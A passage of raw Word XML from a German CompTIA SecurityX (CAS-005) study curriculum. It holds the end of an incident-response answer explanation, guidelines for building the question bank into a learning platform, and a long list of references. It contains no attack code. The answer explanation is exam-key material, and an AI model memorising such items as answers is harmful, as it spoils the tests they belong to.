        <w:t xml:space="preserve"> Ein hartes physisches Ausschalten oder Neustarten (Option C) zerstört flüchtige, unwiederbringliche Beweise im Arbeitsspeicher (Order of Volatility), wie etwa Entschlüsselungs-Keys oder Netzwerkverbindungen.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Das Erstellen forensischer Images (Option D) sichert Beweise für die spätere Root Cause Analysis und juristische Schritte.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Ein sofortiges Einspielen von Backups auf ein kompromittiertes, nicht bereinigtes System (Option E) würde die Backups sofort wieder infizieren und wertvolle Zeit kosten.</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Implementierungsrichtlinien für die Webanwendung und den Unterrichtsstoff</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Für die erfolgreiche Integration dieses Lehrplans und der umfassenden Fragendatenbank in ein modernes Learning Management System (LMS) oder eine interaktive Webanwendung müssen folgende architektonische und pädagogische Parameter zwingend berücksichtigt werden:</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Metadaten-Tagging und adaptives Lernen:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Alle Prüfungsfragen der Datenbank sind mit Metadaten versehen, welche das Zertifizierungs-Level, die Domäne nach den offiziellen CompTIA-Zielen und die kognitive Taxonomiestufe nach Bloom abbilden.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Die Architektur der Webanwendung muss diese Tags nutzen, um adaptives Lernen zu ermöglichen: Erkennt der Algorithmus beispielsweise wiederholte Schwächen eines Lernenden in der Domäne 3.0 (Security Engineering), steuert er dynamisch schwerere, detailliertere Fragen oder Erklärvideos dieses Tiers ein, um die Wissenslücke präzise zu schließen.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Performance-Based Questions (PBQs) Simulation:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Zur realistischen Simulation von PBQs – die in der SecurityX-Prüfung einen signifikanten Anteil ausmachen – sollten Container-Technologien (wie Docker-basierte Web-Labs) in die Lernplattform integriert werden.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Die Integration von Open-Source-Umgebungen wie dem "OWASP Juice Shop" für Web-Application-Security oder cloud-basierten Netzwerksimulatoren zur Analyse von PCAP-Dateien und Log-Dumps spiegelt die praxisorientierte "Hands-on"-Philosophie von CAS-005 exakt wider und garantiert, dass theoretisches Wissen in praktische Fertigkeiten überführt wird.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="444746"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">89</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Quellen-Referenzierung und Deep Linking:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wie im Anforderungsprofil definiert, verweisen die im Text integrierten eckigen Klammern (z.B.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exakt auf die dem System zugrunde liegenden Forschungs-Snippets und Frameworks. Darüber hinaus sind entscheidende primäre Quellen, wie beispielsweise das(</w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0b57d0"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.SP.800-207.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
          <w:color w:val="1f1f1f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), direkt als Hyperlinks in den Text eingewoben, um eine lückenlose Rückverfolgbarkeit zu gewährleisten. Die zugehörigen URLs der Forschungsberichte müssen integraler Bestandteil der Datenbank-Architektur sein und ermöglichen es dem Endnutzer der Web-Applikation, durch einen Klick auf die Referenz die Originalliteratur zur sofortigen Vertiefung aufzurufen.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CompTIA SecurityX (CAS-005) erfordert einen massiven kognitiven Paradigmenwechsel vom operativen, ausführenden Administrator hin zum strategisch denkenden, risikobewussten Architekten. Dieser hochgradig detaillierte Lehrplan transzendiert das bloße Auswendiglernen von Checklisten, indem er abstrakte theoretische Modelle kausal mit den verheerendsten historischen Cyberangriffen unserer Zeit verknüpft. Durch die Synthese dieser tiefgreifenden Analysen mit einem strukturierten, hierarchischen Prüfungsfragenkatalog bietet das vorliegende Curriculum eine lückenlose, wissenschaftliche und hochgradig anwendungsorientierte Basis zur Beherrschung der SecurityX-Zertifizierung.</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SecurityX Certification - CompTIA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.comptia.org/en-us/certifications/securityx/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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CASP+ CAS-004 vs. SecurityX CAS-005 Comparison - CertGet, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://certget.com/comptia-casp-cas-004-vs-securityx-cas-005/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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SecurityX (CASP+): Complete Domains Guide [2025 Update] - Infosec, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.infosecinstitute.com/resources/securityx/securityx-overview-of-domains/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Advanced Security Practitioner (CASP+) Certification ..., Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.tstc.nl/assets/uploads/brochure497</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Bloom's Revised Taxonomy with Verbs for Computing Disciplines - ACM CCECC, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://ccecc.acm.org/files/publications/Blooms-for-Computing-20230119.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Reward-Driven bloom's taxonomy framework for cybersecurity awareness: integrating cognitive learning with gamification principles | Information and Computer Security | Emerald Publishing, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId17">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.emerald.com/ics/article/doi/10.1108/ICS-08-2025-0336/1363089/A-Reward-Driven-bloom-s-taxonomy-framework-for</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Cybersecurity Skills Framework (ECSF) - SANS Institute, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.sans.org/ecsf-framework</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Cybersecurity Skills Framework User Manual - ENISA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.enisa.europa.eu/sites/default/files/publications/European%20Cybersecurity%20Skills%20Framework%20User%20Manual.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Cybersecurity Skills Framework (ECSF) - ENISA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId20">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.enisa.europa.eu/sites/default/files/all_files/1.ECSF.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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the EU Cybersecurity Skills Gap: The ECSF and Certification Mapping - ISC2, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.isc2.org/Insights/2025/10/bridging-EU-cybersecurity-skills-gap-ECSF-and-certification-mapping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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CASP+ Domains Breakdown, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://prepsaret.com/comptia/comptia-casp-domains-breakdown</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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CAS-004 vs. CAS-005: Understand them and make a clear decision to achieve your CompTIA Certifications - Reddit, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.reddit.com/r/HotITCertNews/comments/1hawqci/cas004_vs_cas005_understand_them_and_make_a_clear/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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SecurityX (CASP+) frequently asked questions (FAQ) [2025 update] - Infosec, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.infosecinstitute.com/resources/securityx/securityx-frequently-asked-questions-faq/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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CISSP Security Models in 45 Minutes: Bell-LaPadula, Biba &amp; Clark-Wilson Explained, Zugriff am Mai 8,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https://www.youtube.com/watch?v=io3fc4W_pkU</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Cybersecurity Architecture and Access Control Models: A Comprehensive Guide 🛡️ | by Malinda Gamage | Medium, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@pkgmalinda/understanding-cybersecurity-architecture-and-access-control-models-a-comprehensive-guide-%EF%B8%8F-f80e4ba61ee5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Models and Architecture - TechTarget, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://media.techtarget.com/searchSecurity/downloads/29667C05.pdf</w:t>
        </w:r>
      </w:hyperlink>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Lattice-Based Access Control Models - Computer Science, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId28">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cs.kent.edu/~rothstei/spring_13/papers/Lattice.pdf</w:t>
        </w:r>
      </w:hyperlink>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Lattice-Based Access Control Models1 - Prof. Ravi Sandhu, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://profsandhu.com/journals/computer/i93lbacm.pdf</w:t>
        </w:r>
      </w:hyperlink>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the 6 Information Security Models: Biba, Bell-LaPadula &amp; More, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://destcert.com/resources/information-security-models/</w:t>
        </w:r>
      </w:hyperlink>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Lattice-based access control models - Semantic Scholar, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.semanticscholar.org/paper/Lattice-based-access-control-models-Sandhu/25758a9bfedf24e4a1a0223e79aa048521427757</w:t>
        </w:r>
      </w:hyperlink>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Security Models: Bell-LaPadula, Biba, and Clark-Wilson - Medium, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@samah.ikramfarez/understanding-security-models-bell-lapadula-biba-and-clark-wilson-d1b6a219da4a</w:t>
        </w:r>
      </w:hyperlink>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TOGAF® vs SABSA: Which One Is Better? - The Knowledge Academy, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.theknowledgeacademy.com/blog/togaf-vs-sabsa/</w:t>
        </w:r>
      </w:hyperlink>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2017 Volume 4 Enterprise Security ArchitectureA Top down Approach - ISACA, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.isaca.org/resources/isaca-journal/issues/2017/volume-4/enterprise-security-architecturea-top-down-approach</w:t>
        </w:r>
      </w:hyperlink>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TOGAF vs. SABSA - Conexiam, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://conexiam.com/togaf-vs-sabsa/</w:t>
        </w:r>
      </w:hyperlink>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SABSA vs TOGAF: The Definitive Architecture Certification Comparison (2026) - CertStud, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://certstud.com/blog/togaf-vs-sabsa-architecture-certification-comparison-2025</w:t>
        </w:r>
      </w:hyperlink>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 800-160 Vol. 1, Systems Security Engineering: Considerations for a Multidisciplinary Approach in the Engineering of Trustworthy Secure Systems | CSRC, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://csrc.nist.gov/pubs/sp/800/160/v1/upd2/final</w:t>
        </w:r>
      </w:hyperlink>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 800-160 Vol. 1 Rev. 1, Engineering Trustworthy Secure Systems | CSRC, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://csrc.nist.gov/pubs/sp/800/160/v1/r1/final</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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Considerations for a Multidisciplinary Approach in the Engineering of Trustworthy Secure Systems - NIST Technical Series Publications, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1.pdf</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Trustworthy Secure Systems - NIST Technical Series Publications, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId40">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf</w:t>
        </w:r>
      </w:hyperlink>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 NIST SP 800-160 Vol. 1 Rev. 1, Engineering Trustworthy Secure Systems - CSRC, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://csrc.nist.rip/external/nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1-draft.pdf</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Archived NIST Technical Series Publication, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId42">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-160.pdf</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Putting the "Systems" in Security Engineering: An Examination of NIST Special Publication 800-160, Zugriff am Mai 8, 2026, </w:t>
      </w:r>
      <w:hyperlink r:id="rId43">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Google Sans" w:cs="Google Sans" w:eastAsia="Google Sans" w:hAnsi="Google Sans"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
